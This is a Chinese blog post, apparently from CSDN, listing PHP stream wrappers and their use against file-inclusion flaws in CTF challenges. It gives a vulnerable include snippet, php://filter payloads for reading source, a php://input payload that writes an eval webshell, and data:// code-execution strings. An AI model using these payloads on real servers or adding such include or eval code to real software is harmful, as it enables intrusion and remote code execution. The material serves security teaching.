常用的PHP伪协议大全

最新推荐文章于 2024-05-15 18:21:54 发布
最新推荐文章于 2024-05-15 18:21:54 发布
阅读量952 收藏 4
点赞数 1
分类专栏: # PHP # web安全 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63701832/article/details/128555816
版权
web安全 同时被 2 个专栏收录
105 篇文章 4 订阅
订阅专栏
PHP
13 篇文章 2 订阅
订阅专栏

目录

常见文件包含函数

常见协议

php://

php://filter(本地磁盘文件进行读取)

php://input (读取POST数据)

file://

data:// 

常见文件包含函数

函数功能
include()代码执行到 include() 函数时将文件包含
include_once()当重复调用同一文件时只调用一次,功能与 include() 相同
require()require() 执行如果发生错误,函数会报错并终止脚本
require_once()当重复调用同一文件时只调用一次,功能与 require() 相同

 【include、require、include_once、require_once、highlight_file 、show_source 、readfile 、file_get_contents 、fopen 、file】

常见协议

伪协议功能
file://访问本地文件系统
http://访问 HTTP(s) 网址
php://访问各个输入/输出流
phar://PHP 归档
zip://压缩流
file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

php://

  • 条件

不需要开启allow_url_fopen,仅php://input、 php://stdin、 php://memory 和 php://temp 需要开启allow_url_include 

  • 应用

在CTF中经常使用的是php://filterphp://inputphp://filter用于读取源码,php://input用于执行php代码。 

php://filter(本地磁盘文件进行读取)

php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。

<?php
$filename = $_GET['filename'];
include($filename);
?>
?filename=php://filter/convert.base64-encode/resource=文件名.后缀(flag.php)
?filename=php://filter/read=convert.base64-encode/resource=文件名.后缀(flag.txt)

php://input (读取POST数据)

 enctype=“multipart/form-data” 的时候 php://input 是无效的

php://input + [POST DATA]执行php代码;若有写入权限,写入一句话木马

<?php phpinfo(); ?>
<?php fputs(fopen("shell.php","w"),'<?php eval($_POST["cmd"]);?>');?>

file://

条件:allow_url_fopen和allow_url_include均无要求

[文件的绝对路径和文件名] [文件的相对路径和文件名][http://网络路径和文件名]

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>
file://C:\Users\admin\Desktop\PHP\flag.txt

data:// 

  • 条件

allow_url_fopen:on;allow_url_include :on;通常可以用来执行PHP代码。

data://text/plain;   data://text/plain;base64

data://text/plain,<?php phpinfo();?>
data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
coleak
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
PHP伪协议
m0_75178803的博客
04-02 1160
可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行,从而导致任意文件读取协议参数:常用的有。
PHP 伪协议
m0_56107268的博客
11-08 5593
php伪协议
【文件包含中的伪协议
最新发布
My笔记的博客
05-15 755
php.ini 中的两个重要选项 PHP 中几个比较重要的伪协议php://input 协议还可以用来生成一句话木马,这里假设我们用的之前的直接包含的php代码: 这是一个文件上传的页面可以上传一个文件上去 上传后发现失败了,那就说明不是文件上传的题目,我们在url地址栏发现了一个op参数和一个key参数,我们用文件审查查看一下源代码 点开后,看到一个op的参数,看到这个好参数我们会想到可能存在文件包含,比如我们改成upload 就变成了上传文件的页面,这里我们可以猜到通过op的参数包含不同的文件
[php知识点]PHP伪协议
Landasika的博客
05-17 8150
目录 一、前言1、什么是PHP伪协议2、什么时候用PHP伪协议include和require函数include和include_once的区别(require与require_once的区别)highlight_file()和show_source()readfile和file_get_contents和filefile_put_contentsfopen二、PHP伪协议file://...
php伪协议
weixin_60719780的博客
01-27 4458
PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
PHP伪协议详解
Python老吕的博客
03-06 1863
PHP伪协议PHP自己支持的一种协议与封装协议,简单来说就是PHP定义的一种特殊访问资源的方法。有些伪协议成功执行需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件。
php伪协议概述.pdf
02-24
PHP伪协议是一种特殊的URL协议,用于在PHP中进行文件操作。它允许在URL中指定文件路径,并通过内置的PHP函数来访问和操作文件内容。
php伪协议.zipphp伪协议.zip
02-24
PHP伪协议】是PHP中一种特殊的机制,它允许开发者通过特定的URL格式来访问和操作服务器上的资源,比如文件系统、数据库等。这个概念在PHP的早期版本中较为常见,但出于安全考虑,现代PHP环境中已经对伪协议的使用...
57-57.渗透测试-PHP相关函数和伪协议.mp4
05-10
57-57.渗透测试-PHP相关函数和伪协议.mp4
PHP 伪协议大总结.docx
02-24
PHP 伪协议大总结.docx
php伪协议的解释.txt
02-24
php伪协议
PHP伪协议
errorr0
03-13 6569
php伪协议,安全入门新手值得一看
PHP伪协议精讲(文件包含漏洞)
2301_76251460的博客
07-21 752
PHP伪协议
php常见伪协议总结
m0_57236802的博客
01-18 714
PHP中的伪协议(也称为流包装器)是一种特殊的流访问机制,它允许访问各种类型的资源,如文件、网络资源、压缩文件等。
PHP 伪协议:使用 php://input 访问原始 POST 数据
两个月亮
10-07 5870
php://input 是 PHP 提供的一个伪协议,允许开发者 访问 POST 请求的原始内容。enable_post_data_reading 是 PHP 中的一个布尔配置项,该配置项决定了 是否在 PHP 启动时读取和解析 POST 数据以填充 $_POST 与 $_FILES 超全局变量。在 默认情况 下,enable_post_data_reading 是 开启 的。
PHP封装伪协议之phar流
m0_73720136的博客
05-08 302
通过本实验,利用PHP封装伪协议中的zip流,先将要执行的PHP代码写好文件名为test.txt,将test.txt进行zip压缩,压缩文件名为test.zip,绕过文件上传的限制,如果可以上传zip文件便直接上传,若不能便将test.zip重命名为test.jpg后再上传。使用phar流绝对路径和相对路径都可以。
PHP伪协议详解:深入理解PHP流封装协议
可耐特
03-21 714
伪协议,也称为流封装协议,是PHP用于访问各种数据流的一种机制。通过伪协议开发者可以使用熟悉的文件系统函数,如fopen()fwrite()等,来访问和操作非文件资源。
php伪协议常用代码
08-05
常用PHP伪协议代码包括: 1. 使用php://input执行PHP代码:这种方法可以通过将PHP代码作为POST数据传递,然后使用php://input伪协议来执行代码。例如,可以使用以下代码来执行phpinfo()函数并将结果输出到页面上: ``` <?php eval(file_get_contents('php://input')); ?> ``` 2. 使用php://filter读取源码:php://filter伪协议可以用于读取PHP源码。以下是一个示例代码,可以使用php://filter来读取文件中的PHP源码并输出到页面上: ``` <?php echo file_get_contents('php://filter/read=convert.base64-encode/resource=file.php'); ?> ``` 3. 使用php://filter绕过过滤器:有时候,某些代码会使用过滤器来过滤用户输入,以防止执行危险的操作。但是,可以使用php://filter伪协议来绕过这些过滤器。以下是一个示例代码,可以使用php://filter来绕过文件写入过滤器,并将内容写入指定文件: ``` <?php $content = '<?php exit; ?>'; $content .= $_POST['txt']; file_put_contents($_POST['filename'], $content); ?> ``` 需要注意的是,伪协议在一些环境中可能被禁用或限制,因此在编写代码时需要谨慎处理,并遵循安全最佳实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

coleak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值